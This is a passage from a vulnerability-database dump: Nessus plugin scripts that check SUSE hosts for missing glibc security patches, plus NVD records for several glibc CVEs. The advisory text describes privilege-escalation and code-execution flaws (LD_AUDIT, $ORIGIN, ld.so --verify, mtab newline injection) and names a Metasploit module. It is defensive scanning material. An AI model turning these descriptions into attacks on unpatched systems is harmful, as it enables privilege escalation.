"p-cpe:/a:novell:opensuse:glibc-devel-32bit", "p-cpe:/a:novell:opensuse:glibc-locale-32bit", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:glibc-locale", "p-cpe:/a:novell:opensuse:glibc-html", "p-cpe:/a:novell:opensuse:nscd", "p-cpe:/a:novell:opensuse:glibc-i18ndata"], "id": "SUSE_11_2_GLIBC-101027.NASL", "href": "https://www.tenable.com/plugins/nessus/50373", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update glibc-3400.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50373);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1391\", \"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2010-3847\", \"CVE-2010-3856\");\n\n script_name(english:\"openSUSE Security Update : glibc (openSUSE-SU-2010:0913-1)\");\n script_summary(english:\"Check for the glibc-3400 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of glibc fixes various bugs and security issues :\n\nCVE-2010-3847: Decoding of the $ORIGIN special value in various LD_\nenvironment variables allowed local attackers to execute code in\ncontext of e.g. setuid root programs, elevating privileges. This issue\ndoes not affect SUSE as an assertion triggers before the respective\ncode is executed. The bug was fixed nevertheless.\n\nCVE-2010-3856: The LD_AUDIT environment was not pruned during setuid\nroot execution and could load shared libraries from standard system\nlibrary paths. This could be used by local attackers to inject code\ninto setuid root programs and so elevated privileges.\n\nCVE-2010-0830: Integer overflow causing arbitrary code execution in\nld.so\n\n--verify mode could be induced by a specially crafted binary.\n\nCVE-2010-0296: The addmntent() function would not escape the newline\ncharacter properly, allowing the user to insert arbitrary newlines to\nthe /etc/mtab; if the addmntent() is run by a setuid mount binary that\ndoes not do extra input checking, this would allow custom entries to\nbe inserted in /etc/mtab.\n\nCVE-2008-1391: The strfmon() function contains an integer overflow\nvulnerability in width specifiers handling that could be triggered by\nan attacker that can control the format string passed to strfmon().\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=375315\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=572188\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=592941\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=594263\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=646960\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-10/msg00040.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-profile-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"glibc-2.10.1-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"glibc-devel-2.10.1-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"glibc-html-2.10.1-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"glibc-i18ndata-2.10.1-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"glibc-info-2.10.1-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"glibc-locale-2.10.1-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"glibc-obsolete-2.10.1-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"glibc-profile-2.10.1-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"nscd-2.10.1-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"glibc-32bit-2.10.1-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.10.1-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.10.1-10.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.10.1-10.9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:10:56", "description": "This update of glibc fixes the following bugs and security issues :\n\n - The implementation of initgroups() of the nss_compat\n module omits all NIS groups at the second invocation\n within the same process, and also uses a needlessly\n inefficient method to determine the NIS groups.\n\n - An integer overflow that allows arbitrary code execution\n by running ld.so --verify could be exploited by a\n specially crafted binary. (CVE-2010-0830)\n\n - The addmntent() function does not escape the newline\n character properly, allowing the user to insert\n arbitrary newlines to /etc/mtab. This could be exploited\n to insert custom entries into /etc/mtab if addmntent()\n gets called by a setuid mount binary that does not\n perform extra input checking. (CVE-2010-0296)", "edition": 23, "published": "2011-12-13T00:00:00", "title": "SuSE 11.1 Security Update : glibc (SAT Patch Number 2700)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0296", "CVE-2010-0830"], "modified": "2011-12-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:glibc-profile", "p-cpe:/a:novell:suse_linux:11:glibc-devel-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:glibc-info", "p-cpe:/a:novell:suse_linux:11:glibc-html", "p-cpe:/a:novell:suse_linux:11:glibc-i18ndata", "p-cpe:/a:novell:suse_linux:11:glibc", "p-cpe:/a:novell:suse_linux:11:glibc-32bit", "p-cpe:/a:novell:suse_linux:11:glibc-locale-32bit", "p-cpe:/a:novell:suse_linux:11:glibc-devel", "p-cpe:/a:novell:suse_linux:11:glibc-profile-32bit", "p-cpe:/a:novell:suse_linux:11:nscd", "p-cpe:/a:novell:suse_linux:11:glibc-locale"], "id": "SUSE_11_GLIBC-100709.NASL", "href": "https://www.tenable.com/plugins/nessus/57105", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57105);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-0296\", \"CVE-2010-0830\");\n\n script_name(english:\"SuSE 11.1 Security Update : glibc (SAT Patch Number 2700)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of glibc fixes the following bugs and security issues :\n\n - The implementation of initgroups() of the nss_compat\n module omits all NIS groups at the second invocation\n within the same process, and also uses a needlessly\n inefficient method to determine the NIS groups.\n\n - An integer overflow that allows arbitrary code execution\n by running ld.so --verify could be exploited by a\n specially crafted binary. (CVE-2010-0830)\n\n - The addmntent() function does not escape the newline\n character properly, allowing the user to insert\n arbitrary newlines to /etc/mtab. This could be exploited\n to insert custom entries into /etc/mtab if addmntent()\n gets called by a setuid mount binary that does not\n perform extra input checking. (CVE-2010-0296)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=592941\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=594263\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=607064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0296.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0830.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 2700.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-locale-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-profile-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-2.11.1-0.18.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-32bit-2.11.1-0.18.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-devel-2.11.1-0.18.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.1-0.18.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-html-2.11.1-0.18.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-i18ndata-2.11.1-0.18.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-info-2.11.1-0.18.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-locale-2.11.1-0.18.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.1-0.18.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-profile-2.11.1-0.18.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.1-0.18.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"nscd-2.11.1-0.18.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T19:31:25", "description": "Multiple integer overflows in the strfmon implementation in the GNU C Library (aka glibc or libc6) 2.10.1 and earlier allow context-dependent attackers to cause a denial of service (memory consumption or application crash) via a crafted format string, as demonstrated by a crafted first argument to the money_format function in PHP, a related issue to CVE-2008-1391.", "edition": 5, "cvss3": {}, "published": "2010-06-01T20:30:00", "title": "CVE-2009-4880", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4880"], "modified": "2017-08-17T01:31:00", "cpe": ["cpe:/a:gnu:glibc:2.3.6", "cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:2.3.10", "cpe:/a:gnu:glibc:2.2", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:2.3.3", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:2.9", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.0", "cpe:/a:gnu:glibc:2.3", "cpe:/a:gnu:glibc:2.4", "cpe:/a:gnu:glibc:2.6", "cpe:/a:gnu:glibc:2.2.2", "cpe:/a:gnu:glibc:2.2.5", "cpe:/a:gnu:glibc:2.2.3", "cpe:/a:gnu:glibc:2.10", "cpe:/a:gnu:glibc:2.6.1", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:2.2.4", "cpe:/a:gnu:glibc:2.10.1", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.5.1", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:2.7", "cpe:/a:gnu:glibc:2.0.1", "cpe:/a:gnu:glibc:2.3.2", "cpe:/a:gnu:glibc:2.8", "cpe:/a:gnu:glibc:2.2.1", "cpe:/a:gnu:glibc:2.3.4", "cpe:/a:gnu:glibc:2.1.9", "cpe:/a:gnu:glibc:2.3.5", "cpe:/a:gnu:glibc:2.5", "cpe:/a:gnu:glibc:2.3.1"], "id": "CVE-2009-4880", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4880", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:36", "description": "The encode_name macro in misc/mntent_r.c in the GNU C Library (aka glibc or libc6) 2.11.1 and earlier, as used by ncpmount and mount.cifs, does not properly handle newline characters in mountpoint names, which allows local users to cause a denial of service (mtab corruption), or possibly modify mount options and gain privileges, via a crafted mount request.", "edition": 6, "cvss3": {}, "published": "2010-06-01T20:30:00", "title": "CVE-2010-0296", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0296"], "modified": "2019-06-13T21:29:00", "cpe": ["cpe:/a:gnu:glibc:2.3.6", "cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:2.3.10", "cpe:/a:gnu:glibc:2.2", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:2.3.3", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:2.9", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.11", "cpe:/a:gnu:glibc:2.0", "cpe:/a:gnu:glibc:2.3", "cpe:/a:gnu:glibc:2.4", "cpe:/a:gnu:glibc:2.11.1", "cpe:/a:gnu:glibc:2.6", "cpe:/a:gnu:glibc:2.2.2", "cpe:/a:gnu:glibc:2.2.5", "cpe:/a:gnu:glibc:2.2.3", "cpe:/a:gnu:glibc:2.10", "cpe:/a:gnu:glibc:2.6.1", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:2.2.4", "cpe:/a:gnu:glibc:2.10.1", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.5.1", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:2.7", "cpe:/a:gnu:glibc:2.0.1", "cpe:/a:gnu:glibc:2.3.2", "cpe:/a:gnu:glibc:2.8", "cpe:/a:gnu:glibc:2.2.1", "cpe:/a:gnu:glibc:2.3.4", "cpe:/a:gnu:glibc:2.1.9", "cpe:/a:gnu:glibc:2.3.5", "cpe:/a:gnu:glibc:2.5", "cpe:/a:gnu:glibc:2.3.1"], "id": "CVE-2010-0296", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0296", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:57:22", "description": "Integer signedness error in the elf_get_dynamic_info function in elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or libc6) 2.0.1 through 2.11.1, when the --verify option is used, allows user-assisted remote attackers to execute arbitrary code via a crafted ELF program with a negative value for a certain d_tag structure member in the ELF header.", "edition": 3, "cvss3": {}, "published": "2010-06-01T20:30:00", "title": "CVE-2010-0830", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": 